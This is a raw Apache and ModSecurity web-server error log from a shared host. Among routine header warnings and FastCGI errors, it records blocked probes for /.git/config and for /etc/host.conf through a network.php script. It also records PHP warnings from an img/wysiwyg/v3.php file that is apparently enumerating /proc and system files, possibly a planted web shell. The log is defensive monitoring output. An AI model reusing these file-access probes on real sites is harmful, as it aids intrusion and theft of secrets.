[Tue May 12 04:09:26.567880 2026] [security2:error] [pid 1695975:tid 1695990] [client 216.73.216.110:17053] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agKL1tVI9ymHBxup74-kDgAAAIw"]
[Tue May 12 04:09:26.648297 2026] [security2:error] [pid 1695975:tid 1695990] [client 216.73.216.110:17053] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agKL1tVI9ymHBxup74-kDgAAAIw"]
[Tue May 12 04:09:29.682721 2026] [security2:error] [pid 1707624:tid 1707705] [client 43.155.195.141:41296] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rentparadise.fr"] [uri "/wp-content/uploads/2025/06/chambre-3-bali-scaled.jpeg"] [unique_id "agKL2bOxS7i6i_mT2NLjJQAAAFc"], referer: https://rentparadise.fr/accommodation/lodge-bali/chambre-3-bali/
[Tue May 12 04:09:31.616542 2026] [security2:error] [pid 1695975:tid 1695988] [client 43.128.156.124:33272] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.tchatbooster.com"] [uri "/"] [unique_id "agKL29VI9ymHBxup74-kEAAAAIo"], referer: http://www.tchatbooster.fr
[Tue May 12 04:09:39.080983 2026] [security2:error] [pid 1709071:tid 1709100] [client 43.165.67.31:58878] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.maelbailly.fr"] [uri "/pieces/roue-libre/"] [unique_id "agKL47vMumyrWMfSu7rDLQAAAM0"]
[Tue May 12 04:09:39.795307 2026] [security2:error] [pid 1730175:tid 1730195] [client 43.134.111.60:49254] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKL43o6NvB9WXx5V-6TfgAAARI"]
[Tue May 12 04:09:46.526505 2026] [security2:error] [pid 1709071:tid 1709095] [client 8.231.42.251:41320] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.dev3.rentparadise.fr"] [uri "/.git/config"] [unique_id "agKL6rvMumyrWMfSu7rDOgAAAMg"]
[Tue May 12 04:09:46.526781 2026] [security2:error] [pid 1709071:tid 1709095] [client 8.231.42.251:41320] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.dev3.rentparadise.fr"] [uri "/.git/config"] [unique_id "agKL6rvMumyrWMfSu7rDOgAAAMg"]
[Tue May 12 04:09:47.641985 2026] [security2:error] [pid 1709071:tid 1709095] [client 8.231.42.251:41320] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.dev3.rentparadise.fr"] [uri "/index.php"] [unique_id "agKL6rvMumyrWMfSu7rDOgAAAMg"]
[Tue May 12 04:09:50.058252 2026] [autoindex:error] [pid 1695975:tid 1695990] [client 52.167.144.19:62922] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
PHP Warning:  filesize(): stat failed for /proc/1704816/task/1706010/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/1706010/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/1706010/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/1706010/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/1706010/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/1706010/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 04:10:09.052468 2026] [security2:error] [pid 1695975:tid 1695999] [client 43.133.66.51:50568] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.castiglionecorporatefinance.fr"] [uri "/"] [unique_id "agKMAdVI9ymHBxup74-kNgAAAJU"]
[Tue May 12 04:10:14.485171 2026] [security2:error] [pid 1730207:tid 1730211] [client 43.133.66.51:54722] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.castiglionecorporatefinance.fr"] [uri "/"] [unique_id "agKMBjue9Sp-pIv_Bb6pCAAAAUI"], referer: http://www.castiglionecorporatefinance.fr
[Tue May 12 04:10:30.924016 2026] [:error] [pid 1730175:tid 1730187] [client 185.196.89.19:6332] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 04:10:38.118930 2026] [security2:error] [pid 1695975:tid 1695988] [client 216.73.216.110:58771] ModSecurity: Warning. Matched phrase "etc/host.conf" at ARGS:filesrc. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: etc/host.conf found within ARGS:filesrc: /etc/host.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agKMHtVI9ymHBxup74-kYwAAAIo"]
[Tue May 12 04:10:38.119479 2026] [security2:error] [pid 1695975:tid 1695988] [client 216.73.216.110:58771] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agKMHtVI9ymHBxup74-kYwAAAIo"]
[Tue May 12 04:10:38.200565 2026] [security2:error] [pid 1695975:tid 1695988] [client 216.73.216.110:58771] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agKMHtVI9ymHBxup74-kYwAAAIo"]
PHP Warning:  filesize(): stat failed for /proc/1704816/task/1899834/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/1899834/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/1899834/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/1899834/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/1899834/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/1899834/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 04:10:48.857110 2026] [authz_core:error] [pid 1730207:tid 1730225] [client 47.128.125.62:58192] AH01630: client denied by server configuration: /home/maelbail/public_html/wp-includes/rest-api/fields/error_log
PHP Warning:  filesize(): stat failed for /proc/229/task/229/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/229/task/229/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/229/task/229/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/229/task/229/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/229/task/229/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/229/task/229/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /opt/alt/openssl/share/man/man1/openssl-passwd.1ssl in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /opt/alt/openssl/share/man/man1/openssl-passwd.1ssl in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /opt/alt/openssl/share/man/man1/openssl-rand.1ssl in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /opt/alt/openssl/share/man/man1/openssl-rand.1ssl in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 04:10:56.676033 2026] [security2:error] [pid 1808852:tid 1808878] [client 43.156.117.41:52272] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "letamsgarage.fr"] [uri "/"] [unique_id "agKMMBfeipD4uoG21FoWKQAAABc"]
[Tue May 12 04:10:58.680612 2026] [security2:error] [pid 1808852:tid 1808876] [client 43.153.10.83:58750] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.jeanboyault.fr"] [uri "/lecteur-heureux/"] [unique_id "agKMMhfeipD4uoG21FoWKgAAABU"]
[Tue May 12 04:11:03.097913 2026] [security2:error] [pid 1707624:tid 1707691] [client 43.156.117.41:59332] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "letamsgarage.fr"] [uri "/"] [unique_id "agKMN7OxS7i6i_mT2NLjhQAAAEk"], referer: http://letamsgarage.fr
[Tue May 12 04:11:07.473544 2026] [authz_core:error] [pid 1730207:tid 1730221] [client 47.128.125.39:16028] AH01630: client denied by server configuration: /home/maelbail/public_html/wp-includes/Requests/error_log
[Tue May 12 04:12:23.686744 2026] [security2:error] [pid 1730175:tid 1730194] [client 43.156.249.28:59578] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "of-crystal-lake.net"] [uri "/page.php"] [unique_id "agKMh3o6NvB9WXx5V-6UPAAAARE"]
PHP Warning:  filesize(): stat failed for /proc/203/task/203/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/203/task/203/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/203/task/203/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/203/task/203/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/203/task/203/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/203/task/203/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/2174132/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/2174132/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/2174132/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/2174132/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/2174132/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/2174132/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 04:13:35.235298 2026] [security2:error] [pid 1707624:tid 1707687] [client 43.130.72.40:58734] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "krakoukas.com"] [uri "/category/informatique/logiciel/torrent/"] [unique_id "agKMz7OxS7i6i_mT2NLkRgAAAEU"]
[Tue May 12 04:14:15.536545 2026] [cgid:error] [pid 1730207:tid 1730230] [client 216.73.216.110:20351] Script timed out before returning headers: ea-php74
[Tue May 12 04:14:31.200132 2026] [proxy_fcgi:error] [pid 1707624:tid 1707685] [client 20.9.31.235:20654] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:31.308604 2026] [proxy_fcgi:error] [pid 1707624:tid 1707685] [client 20.9.31.235:20654] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:31.419759 2026] [proxy_fcgi:error] [pid 1707624:tid 1707685] [client 20.9.31.235:20654] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:31.531514 2026] [proxy_fcgi:error] [pid 1707624:tid 1707685] [client 20.9.31.235:20654] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:31.642704 2026] [proxy_fcgi:error] [pid 1707624:tid 1707685] [client 20.9.31.235:20654] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:31.748006 2026] [proxy_fcgi:error] [pid 1707624:tid 1707685] [client 20.9.31.235:20654] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:31.858339 2026] [proxy_fcgi:error] [pid 1707624:tid 1707685] [client 20.9.31.235:20654] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:31.976145 2026] [proxy_fcgi:error] [pid 1707624:tid 1707685] [client 20.9.31.235:20654] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:32.089091 2026] [proxy_fcgi:error] [pid 1707624:tid 1707685] [client 20.9.31.235:20654] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:32.194560 2026] [proxy_fcgi:error] [pid 1707624:tid 1707685] [client 20.9.31.235:20654] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:32.529659 2026] [proxy_fcgi:error] [pid 1707624:tid 1707685] [client 20.9.31.235:20654] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:32.873757 2026] [proxy_fcgi:error] [pid 1707624:tid 1707685] [client 20.9.31.235:20654] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:32.979989 2026] [proxy_fcgi:error] [pid 1707624:tid 1707685] [client 20.9.31.235:20654] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:33.090687 2026] [proxy_fcgi:error] [pid 1707624:tid 1707685] [client 20.9.31.235:20654] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:33.204049 2026] [proxy_fcgi:error] [pid 1707624:tid 1707685] [client 20.9.31.235:20654] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:33.423510 2026] [proxy_fcgi:error] [pid 1707624:tid 1707685] [client 20.9.31.235:20654] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:33.534115 2026] [proxy_fcgi:error] [pid 1707624:tid 1707685] [client 20.9.31.235:20654] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:33.645117 2026] [proxy_fcgi:error] [pid 1707624:tid 1707685] [client 20.9.31.235:20654] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:33.751572 2026] [proxy_fcgi:error] [pid 1707624:tid 1707685] [client 20.9.31.235:20654] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:33.968226 2026] [proxy_fcgi:error] [pid 1707624:tid 1707685] [client 20.9.31.235:20654] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:34.074377 2026] [proxy_fcgi:error] [pid 1707624:tid 1707685] [client 20.9.31.235:20654] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:34.184523 2026] [proxy_fcgi:error] [pid 1707624:tid 1707685] [client 20.9.31.235:20654] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:34.296963 2026] [proxy_fcgi:error] [pid 1707624:tid 1707685] [client 20.9.31.235:20654] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:34.828317 2026] [proxy_fcgi:error] [pid 1707624:tid 1707685] [client 20.9.31.235:20654] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:34.938288 2026] [proxy_fcgi:error] [pid 1707624:tid 1707685] [client 20.9.31.235:20654] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:35.044177 2026] [proxy_fcgi:error] [pid 1707624:tid 1707685] [client 20.9.31.235:20654] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:35.153197 2026] [proxy_fcgi:error] [pid 1707624:tid 1707685] [client 20.9.31.235:20654] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:35.263317 2026] [proxy_fcgi:error] [pid 1707624:tid 1707685] [client 20.9.31.235:20654] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:35.370507 2026] [proxy_fcgi:error] [pid 1707624:tid 1707685] [client 20.9.31.235:20654] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:35.478240 2026] [proxy_fcgi:error] [pid 1707624:tid 1707685] [client 20.9.31.235:20654] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:35.590644 2026] [proxy_fcgi:error] [pid 1707624:tid 1707685] [client 20.9.31.235:20654] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:35.698709 2026] [proxy_fcgi:error] [pid 1707624:tid 1707685] [client 20.9.31.235:20654] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:35.805404 2026] [proxy_fcgi:error] [pid 1707624:tid 1707685] [client 20.9.31.235:20654] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:36.348860 2026] [proxy_fcgi:error] [pid 1707624:tid 1707685] [client 20.9.31.235:20654] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:36.458350 2026] [proxy_fcgi:error] [pid 1707624:tid 1707685] [client 20.9.31.235:20654] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:36.565433 2026] [proxy_fcgi:error] [pid 1707624:tid 1707685] [client 20.9.31.235:20654] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:36.780310 2026] [proxy_fcgi:error] [pid 1707624:tid 1707685] [client 20.9.31.235:20654] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:36.889232 2026] [proxy_fcgi:error] [pid 1707624:tid 1707685] [client 20.9.31.235:20654] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:37.109792 2026] [proxy_fcgi:error] [pid 1707624:tid 1707685] [client 20.9.31.235:20654] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:37.216429 2026] [proxy_fcgi:error] [pid 1707624:tid 1707685] [client 20.9.31.235:20654] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:37.324967 2026] [proxy_fcgi:error] [pid 1707624:tid 1707685] [client 20.9.31.235:20654] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:37.435025 2026] [proxy_fcgi:error] [pid 1707624:tid 1707685] [client 20.9.31.235:20654] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:37.540657 2026] [proxy_fcgi:error] [pid 1707624:tid 1707685] [client 20.9.31.235:20654] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:37.646058 2026] [proxy_fcgi:error] [pid 1707624:tid 1707685] [client 20.9.31.235:20654] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:37.754417 2026] [proxy_fcgi:error] [pid 1707624:tid 1707685] [client 20.9.31.235:20654] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:37.966867 2026] [proxy_fcgi:error] [pid 1707624:tid 1707685] [client 20.9.31.235:20654] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:38.082416 2026] [proxy_fcgi:error] [pid 1707624:tid 1707685] [client 20.9.31.235:20654] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:38.189655 2026] [proxy_fcgi:error] [pid 1707624:tid 1707685] [client 20.9.31.235:20654] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:38.295177 2026] [proxy_fcgi:error] [pid 1707624:tid 1707685] [client 20.9.31.235:20654] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:38.402497 2026] [proxy_fcgi:error] [pid 1707624:tid 1707685] [client 20.9.31.235:20654] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:38.514555 2026] [proxy_fcgi:error] [pid 1707624:tid 1707685] [client 20.9.31.235:20654] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:38.622616 2026] [proxy_fcgi:error] [pid 1707624:tid 1707685] [client 20.9.31.235:20654] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:38.728105 2026] [proxy_fcgi:error] [pid 1707624:tid 1707685] [client 20.9.31.235:20654] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:38.841584 2026] [proxy_fcgi:error] [pid 1707624:tid 1707685] [client 20.9.31.235:20654] AH01071: Got error 'Primary script unknown'
